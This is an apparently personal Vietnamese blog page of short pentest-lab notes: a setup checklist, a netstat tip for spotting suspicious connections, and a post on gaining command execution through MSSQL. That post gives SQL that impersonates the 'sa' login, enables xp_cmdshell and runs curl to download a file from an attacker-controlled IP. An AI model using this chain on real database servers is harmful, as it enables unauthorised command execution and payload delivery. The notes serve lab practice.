Bài đăng

Đang hiển thị bài đăng từ Tháng 6, 2024

Thực thi RCE via MSSQL CLI

-- Switch to the 'sa' user context EXECUTE AS LOGIN='sa'; -- Enable advanced options EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; -- Enable xp_cmdshell EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Use xp_cmdshell to download the file using curl EXECUTE xp_cmdshell "curl http://10.10.14.61:1234/a";
Đăng nhận xét
Đọc thêm

Kiểm tra các kết nối ẩn với máy tính

netstat -abf 5  Lệnh này sẽ liệt kê các kết nối với Internet. Nếu có link lạ, có thể đó là virus
Đăng nhận xét
Đọc thêm

Setup máy ảo

 Setup  Download vulnbox va import tren may attacker and client chuyen thanh only host adapter Nho set cable connect nmap -pn ip/24 de detect client ip
Đăng nhận xét
Đọc thêm